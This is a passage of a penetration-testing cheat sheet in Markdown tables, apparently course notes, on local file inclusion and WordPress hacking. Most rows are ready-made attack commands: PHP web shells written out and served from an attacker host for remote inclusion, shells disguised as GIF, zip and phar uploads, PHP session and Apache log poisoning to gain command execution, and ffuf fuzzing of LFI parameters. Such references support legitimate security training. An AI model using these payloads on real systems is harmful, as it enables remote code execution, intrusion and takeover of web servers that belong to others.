| `echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>` | Host web shell |
| `/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id` | Include remote PHP web shell |
| **LFI + Upload** |
| `echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif` | Create malicious image |
| `/index.php?language=./profile_images/shell.gif&cmd=id` | RCE with malicious uploaded image |
| `echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php` | Create malicious zip archive 'as jpg' |
| `/index.php?language=zip://shell.zip%23shell.php&cmd=id` | RCE with malicious uploaded zip |
| `php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg` | Create malicious phar 'as jpg' |
| `/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id` | RCE with malicious uploaded phar |
| **Log Poisoning** |
| `/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd` | Read PHP session parameters |
| `/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E` | Poison PHP session with web shell |
| `/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id` | RCE through poisoned PHP session |
| `curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'` | Poison server log |
| `/index.php?language=/var/log/apache2/access.log&cmd=id` | RCE through poisoned server log |

## Misc

| **Command** | **Description** |
| --------------|-------------------|
| `ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287` | Fuzz page parameters |
| `ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287` | Fuzz LFI payloads |
| `ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287` | Fuzz webroot path |
| `ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287` | Fuzz server configurations |
| [LFI Wordlists](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI) | |
| [LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt) | |
| [Webroot path wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt) | [Webroot path wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt) |
| [Server configurations wordlist for Linux](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux) | [Server configurations wordlist for Windows](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows) |

## File Inclusion Functions

| **Function** | **Read Content** | **Execute** | **Remote URL** |
| ----- | :-----: | :-----: | :-----: |
| **PHP** |
| `include()`/`include_once()` | ✅ | ✅ | ✅ |
| `require()`/`require_once()` | ✅ | ✅ | ❌ |
| `file_get_contents()` | ✅ | ❌ | ✅ |
| `fopen()`/`file()` | ✅ | ❌ | ❌ |
| **NodeJS** |
| `fs.readFile()` | ✅ | ❌ | ❌ |
| `fs.sendFile()` | ✅ | ❌ | ❌ |
| `res.render()` | ✅ | ✅ | ❌ |
| **Java** |
| `include` | ✅ | ❌ | ❌ |
| `import` | ✅ | ✅ | ✅ |
| **.NET** |
| `@Html.Partial()` | ✅ | ❌ | ❌ |
| `@Html.RemotePartial()` | ✅ | ❌ | ✅ |
| `Response.WriteFile()` | ✅ | ❌ | ❌ |
| `include` | ✅ | ✅ | ✅ |

# HACKING WORDPRESS

| **Command** | **Description** |
| --------------|-------------------|
| `tree -L 1` | Lists contents of current directory |
| `curl -s -X GET <url>` | Makes a GET request to a webserver and receives the HTML source code of the requested web page |
| `curl -I -X GET <url>` | Prints the response header of the GET request from the requested web page |
| `curl -X POST -d <data> <url>` | Sends a POST request with data to a specific webserver |
| `wpscan --url <url> -e ap` | Scans a specific WordPress application to enumerate plugins |
| `wpscan --url <url> -e u` | Scans a specific WordPress application to enumerate users |
| `msfconsole` | Starts Metasploit Framework |
| `html2text` | Converts redirected HTML output or files to easily readable output |
| `grep <pattern>` | Filters a specific pattern in files or redirected output |
| `jq` | Transforms JSON input and streams of JSON entities |
| `man <tool>` | Man provides you with the manpage of the specific tool |

###### tags: `Cheat Sheet`